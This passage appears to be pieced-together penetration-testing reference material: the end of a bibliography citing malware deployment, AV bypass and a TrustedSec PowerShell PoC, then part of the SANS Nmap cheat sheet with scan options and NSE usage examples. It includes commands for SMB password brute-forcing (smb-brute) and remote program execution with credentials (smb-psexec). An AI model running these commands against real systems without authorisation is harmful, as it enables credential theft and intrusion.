[5] SANS Institute. IEEE 802.11 Pocket Reference Guide. http://www.willhackforsushi.com/papers/80211_Pocket_Reference_Guide.pdf. Accessed on 16 Nov 2012.
[6] Tomes, Tim. Remote Malware Deployment and a Lil' AV Bypass. http://pauldotcom.com/2012/05/remote-malware-deployment-and.html. Accessed on 22 Jan 2013.
[7] TrustedSec. PowerShell PoC. Accessed on 25 Jan 2013.
    The following copyright and disclaimer apply:
    Copyright 2012 TrustedSec, LLC. All rights reserved.
    Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
    Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
    THIS SOFTWARE IS PROVIDED BY TRUSTEDSEC, LLC "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL TRUSTEDSEC, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of TRUSTEDSEC, LLC.
[8] SSL and stunnel. http://www.kioptrix.com/blog/?p=687. Accessed on 01 Feb 2013.
[9] "Using Nmap to Screenshot Web Services". http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html. Accessed on 26 Feb 2013.
[10] "Schtasks Persistence with PowerShell One Liners". Accessed on 21 Nov 2013.



Scripting Engine
-sC                                          Run default scripts
--script=<ScriptName>|<ScriptCategory>|<Dir>|...
                                             Run individual or groups of scripts
--script-args=<n1=v1,...>                    Use the list of script arguments
--script-updatedb                            Update script database

Script Categories
Nmap's script categories include, but are not limited to, the following:
auth: Utilize credentials or bypass authentication on target hosts.
broadcast: Discover hosts not included on command line by broadcasting on local network.
brute: Attempt to guess passwords on target systems, for a variety of protocols, including http, SNMP, IAX, MySQL, VNC, etc.
default: Scripts run automatically when -sC or -A are used.
discovery: Try to learn more information about target hosts through public sources of information, SNMP, directory services, and more.
dos: May cause denial of service conditions in target hosts.
exploit: Attempt to exploit target systems.
external: Interact with third-party systems not included in target list.
fuzzer: Send unexpected input in network protocol fields.
intrusive: May crash target, consume excessive resources, or otherwise impact target machines in a malicious fashion.
malware: Look for signs of malware infection on the target hosts.
safe: Designed not to impact target in a negative fashion.
version: Measure the version of software or protocol spoken by target hosts.
vuln: Measure whether target systems have a known vulnerability.

Notable Scripts
A full list of Nmap Scripting Engine scripts is available at http://nmap.org/nsedoc/
Some particularly useful scripts include:

dns-zone-transfer: Attempts to pull a zone file (AXFR) from a DNS server.
$ nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain> -p53 <hosts>

http-robots.txt: Harvests robots.txt files from discovered web servers.
$ nmap --script http-robots.txt <hosts>

smb-brute: Attempts to determine valid username and password combinations via automated guessing.
$ nmap --script smb-brute.nse -p445 <hosts>

smb-psexec: Attempts to run a series of programs on the target machine, using credentials provided as scriptargs.
$ nmap --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <hosts>

Nmap Cheat Sheet v1.0 - POCKET REFERENCE GUIDE - SANS Institute - http://www.sans.org

Base Syntax
# nmap [ScanType] [Options] {targets}

Target Specification
IPv4 address: 192.168.1.1
IPv6 address: AABB:CCDD::FF%eth0
Host name: www.target.tgt
IP address range: 192.168.0-255.0-255
CIDR block: 192.168.0.0/16
Use file with lists of targets: -iL <file>

Target Ports
No port range specified scans 1,000 most popular ports
-F                           Scan 100 most popular ports
-p<port1>-<port2>            Port range
-p<port1>,<port2>,...        Port List
-pU:53,U:110,T20-445         Mix TCP and UDP
-r                           Scan linearly (do not randomize ports)
--top-ports <n>              Scan n most popular ports
-p-65535                     Leaving off initial port in range makes Nmap scan start at port 1
-p0-                         Leaving off end port in range makes Nmap scan through port 65535
-p-                          Scan ports 1-65535

Probing Options
(default)                    Default probe (TCP 80, 445 & ICMP)
-Pn                          Don't probe (assume all hosts are up)
-PE                          Use ICMP Echo Request
-PP                          Use ICMP Timestamp Request

Fine-Grained Timing Options
--min-hostgroup/max-hostgroup <size>
                             Parallel host scan group sizes
--max-rate <number>          Send packets no faster than <number> per second
--min-rate <number>          Send packets no slower than <number> per second
--scan-delay/--max-scan-delay